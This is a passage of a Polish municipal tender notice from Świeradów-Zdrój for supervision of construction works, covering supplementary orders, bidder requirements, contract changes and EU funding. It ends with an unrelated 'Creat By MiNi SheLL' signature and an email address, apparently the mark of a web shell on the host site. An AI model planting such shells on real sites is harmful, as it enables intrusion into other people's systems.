8. Prawa i obowiązki wynikające z niniejszego przedmiotu zamówienia, nie wykluczają obowiązku wykonywania w ramach zakresu umowy wszystkich innych czynności i zadań, które będą konieczne do prawidłowej realizacji umowy oraz zabezpieczenia interesów Zamawiającego zgodnie z obowiązującymi przepisami prawa oraz wytycznymi RPO WD. Czynności i zadania, o których mowa w zdaniu poprzedzającym realizowane będą z własnej inicjatywy Wykonawcy lub na zlecenie Zamawiającego w ramach ustalonego wynagrodzenia ryczałtowego.
9.W przypadku niejasności w zakresie praw i obowiązków Wykonawcy ustala się, iż celem niniejszej umowy jest  osiągnięcie celu projektu zgodnie z obowiązującymi przepisami prawa oraz wytycznymi RPO WD, a w przypadku uzyskania przez Zamawiającego dofinansowania również PROW.
10. Przedmiot umowy  będzie wykonywany  zgodnie z Dokumentacją Projektową, Specyfikacją Techniczną Wykonania i Odbioru Robót Budowlanych, współczesną wiedzą techniczną, pozwoleniem na budowę, decyzją środowiskową, umową o dofinansowanie zawartą między Zamawiającym a Zarządem Województwa Dolnośląskiego,  przekazanymi w 1 egzemplarzu przez Zamawiającego.
11.Roboty budowlane będące przedmiotem nadzoru wykonane zostaną z materiałów dostarczonych przez Wykonawcę robót budowlanych. Wszelkie zastosowane materiały budowlane muszą być nowe, nieużywane, oraz odpowiadać co do jakości wymaganiom określonym w ustawie z dnia 16 kwietnia 2004r. o wyrobach budowlanych (Dz. U. , Nr 92, poz. 881), a także wymaganiom jakościowym określonym w Specyfikacjach Technicznych Wykonania i Odbioru Robót Budowlanych oraz Dokumentacji Projektowej..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje możliwość udzielenia zamówień uzupełniających, o których mowa w art. 67 ust. 1 pkt 6 ustawy z dnia 29 stycznia 2004r. Prawo zamówień publicznych o wartości 20% zamówienia podstawowego, obejmujących  nadzór inwestorski nad przewidywanymi do udzielania robotami uzupełniajacymi w zakresie:
1) dostawa i montaż dodatkowej pijałki, w tym: postument z piaskowca z figurką z brązu, misa z granitu i miniławeczki kamienne z piaskowca oraz instalacji wodnej i kanalizacyjnej w obrębie pijałki, z armaturą , wylewką i syfonem (wzór figurki - glina szamotowa wypalona na biskwit - stanowiąca podstawę do wykonania odlewów z brązu zostanie dostarczona przez Zamawiającego),
2) wymiany istniejącego kanału sieci kanalizacji deszczowej  o 1000 - dł. ok. 12 m
3) rozbiórki murków kamiennych do poziomu planowanego chodnika o wymiarach 2,1 m3, 4,3 m3, 4,4m3 i  wykonanie czapy kamiennej  murku o dł. 33 mb  - granit (płyty cięte, polerowane - wym 0,4m x 0,1m) oraz dostawa i montaż balustrady kutej o łącznej długości 13mb+21mb = 33 mb
4) budowa kanału kolektora sieci kanalizacji sanitarnej z rur PVC (o 200) - 20 mb oraz montaż dodatkowo 1 szt.  studni z tworzyw sztucznych (PVC) - o  600 wraz z zagęszczeniem trasy przekopu oraz odtworzeniem nawierzchni po przekopie (nawierzchnia z kostki granitowej oraz schody terenowe - trójstopnicowe - stopnice z bloków granitowych - cięte, płomieniowane) - połączenie budowanego kolektora z istniejącą siecią.
5) wykonanie 2 dodatkowych przyłączy wraz z niezbędną armaturą ( o 40) o dł. ok. 5,50 mb (budynek Zdrojowa 4) oraz dł. ok. 8,0 mb (budynek Zdrojowa 1).</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.24.70.00-1, 71.24.80.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.12.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Przystępując do niniejszego postępowania każdy Wykonawca zobowiązany jest wnieść wadium  w następującej  wysokości: 2.500,00 zł (słownie złotych: dwa  tysiące pięćset  00/100).</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca posiada uprawnienie do wykonywania określonej działalności
lub czynności. W celu potwierdzenia, że Wykonawca spełnia warunek nr 1 należy
przedłożyć Oświadczenie o spełnieniu warunków określonych w art. 22 ust. 1 ustawy
Prawo Zamówień Publicznych Wykonawca spełnia warunek nr 1 jeżeli przedłoży
oświadczenie o którym mowa w kol. III zgodne ze wzorem stanowiącym załącznik
nr 2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca posiada uprawnienie do wykonywania określonej działalności lub
czynności na podstawie art. 22 ust. 1 - dysponuje osobami zdolnymi do wykonania
zamówienia tj. osobą posiadają kwalifikacje i uprawnienia do kierowania robotami
budowlanymi w specjalności drogowej w ograniczonym zakresie do pełnienia
funkcji kierownika budowy wraz z uprawnieniami do kierowania pracami
konserwatorskimi przy zabytkach nieruchomych, zgodnie z Rozporządzeniem
Ministra Kultury z dnia 27 lipca 2011 r. w sprawie prowadzenia prac
konserwatorskich, prac restauratorskich, robót budowlanych, badań
konserwatorskich, badań architektonicznych i innych działań przy zabytku wpisanym
do rejestru zabytków oraz badań archeologicznych (Dz. U. Nr 165 poz. 987).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Strony  przewidują  dopuszczalne zmiany postanowień umowy   w przypadku wystąpienia jednego z następujących zdarzeń:
a) uniemożliwiających lub utrudniających prawidłowe wykonywanie zamówienia lub wykonanie zamówienia w terminie, których Wykonawca lub Zamawiający nie mogli przewidzieć, 
b) które mogą negatywnie wpłynąć na trwałość przedmiotu umowy, 
c) narazić Zamawiającego na szkodę, dopuszcza się zmiany w umowie.
2. Zakres dopuszczalnych zmian:
a) konieczności zmiany terminu realizacji umowy  z uwagi na zmianę terminu nadzorowanych  robót budowlanych ;termin wykonania zamówienia (umowy) ulega wydłużeniu o czas równy 
terminowi  nadzorowanych  robót budowlanych,
b) konieczności zmiany terminu realizacji umowy  z uwagi na zmiana sposobu wykonania zamówienia w stosunku do sposobu określonego przed zawarciem umowy, dopuszczalna jest na skutek okoliczności, których nie można było przewidzieć w chwili wyboru najkorzystniejszej oferty lub zmiany te są korzystne dla Zamawiającego, a Wykonawca wyrazi na nie zgodę
c)konieczności zmiany terminu realizacji umowy  z uwagi na realizację w drodze odrębnej umowy prac powiązanych z przedmiotem niniejszej umowy wymuszającej konieczność skoordynowania prac i wzajemnych powiązań.
d) zmiany danych osobowych i zmiany osób tj. przedstawicieli Wykonawcy wymienionych w treści umowy,z powodów  i w sposób wymieniony w umowie , 
e)zmiany danych teleadresowych, zmiany osób wskazanych do kontaktów między stronami, 
f) zmiana danych związanych z obsługą administracyjną umowy np. zmiana rachunku bankowego,
g)zmiana postanowień niniejszej umowy w przypadku zmiany powszechnie obowiązującego prawa, 
k) z przyczyn leżących po stronie Zamawiającego, wynikających ze zmiany stosunków społeczno-gospodarczych lub z innych powodów wystąpi konieczność zmiany terminu, zakresu, bądź innych zapisów umowy, bez zmiany których realizacja umowy będzie utrudniona, niemożliwa lub narazi Zamawiającego na szkodę  czy też będzie miała negatywny wpływ na trwałość  projektu,
l)z powodu działań osób trzecich uniemożliwiających wykonanie prac, które to działania nie są konsekwencją winy którejkolwiek ze stron</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> bip.umswieradowzdroj.nv.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Świeradów-Zdrój ul. 11- go Listopada 35 Świeradów-Zdrój pokój 21a.
IV.4.4).</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.02.2014 godzina 14:00, miejsce: Urząd Miasta Świeradów-Zdrój ul. 11- go Listopada 35 Świeradów-Zdrój sekretariat 1d.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt jest dofinansowany ze środków Unii
Europejskiej w ramach Priorytetu nr 6 Wykorzystanie i promocja potencjału turystycznego i
kulturowego Dolnego Śląska (Turystyka i kultura ),Działania 6.1 Turystyka uzdrowiskowa
Regionalnego Programu Operacyjnego dla Województwa Dolnośląskiego na lata 2007-2013 (dotyczy nadzoru nad  zadaniami inwestycyjnymi  nr 1, 2, 3, 4, 5 ),
Zamawiający ubiega się o dofinansowanie ze środków Unii Europejskiej w ramach
Europejskiego Funduszu Rolnego na Rzecz Rozwoju Obszarów Wiejskich w ramach działania Podstawowe usługi dla gospodarki i ludności wiejskiej objętego Programem Rozwoju Obszarów
Wiejskich na lata 2007-2013 (dotyczy nadzoru nad  zadaniem inwestycyjnym  nr 7 ).</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com